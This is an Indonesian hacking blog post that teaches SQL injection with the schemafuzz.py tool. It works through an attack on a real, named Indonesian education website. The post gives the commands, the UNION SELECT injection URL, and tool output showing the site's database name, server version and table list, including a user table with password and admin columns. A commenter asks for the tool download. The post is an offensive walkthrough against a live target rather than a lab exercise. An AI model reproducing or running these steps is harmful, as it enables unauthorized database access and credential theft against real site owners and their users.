Search
logo blog
Selamat Datang Di Blog Kompi Males
Terima kasih atas kunjungan Anda di blog Kompi Males,
semoga apa yang saya share di sini bisa bermanfaat dan memberikan motivasi pada kita semua
untuk terus berkarya dan berbuat sesuatu yang bisa berguna untuk orang banyak.
Cara Cari vlun web dgn cepat

Cara Cari vlun web dgn cepat

on HACKING, WEB HACKING On 02.42 with 1 comment

Menggunakan schemafuzz.py
  
1.Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
2.Schemafuzz (http://darkc0de.com/others/schemafuzz.py)
3.CMD

Dg cmd masuk ke folder tempat schemafuzz.py berada...
Awali pertintah dengan format:
schemafuzz.py -u "url target" --perintah
List perintah ada dibawah...


1.Cari target
Misal: http://www.ditplb.or.id/profile.php?id=1

2.Masukkan perintah untuk mencari colom
Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1"; --findcol
Maka keluar:
[+] URL: http://www.ditplb.or.id/profile.php?id=1--
[+]
Evasion Used: "+" "--"

[+] 20:36:29

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,
[+] Column Length is: 3

[+] Found null column at column #: 2

[+] SQLi URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2--

[+] darkc0de
URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de
[-] Done!



Berarti kita gunain
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de
untuk inject

3.Cari database dg command --dbs
Misal : schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--dbs
Maka keluar:
[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:39:32

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...
   
Database: t15618_plb   
User: t15618_pl...@localhost
   
Version: 5.0.32-Debian_7etch8

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0]   t15618_plb 


[-] 20:39:39

[-] Total URL Requests 3

[-] Done


keliatan kan nama databasenya ??? t15618_plb

4.Cari nama table dalam database
Misal: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D namadatabase
Jadinya: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D t15618_plb
Maka keluar:

[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:43:10

[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

Database: t15618_plb
   
User: t15618_pl...@localhost

Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done
Enter your email address to get update from Kompi Ajaib.
Print PDF
Next
« Prev Post Previous
Next Post »

1 comments:

avatar
Anonim
15 Juni 2011 pukul 05.21

mantabs gan, but http://darkc0de.com/others/schemafuzz.py udahn ga aktif gan??? ane pengen donlot gan, help me

djudul@yahoo.com

Balas

Copyright © 2013. INFORMASI INTERNET - All Rights Reserved | Template Created by Kompi Ajaib Proudly powered by Blogger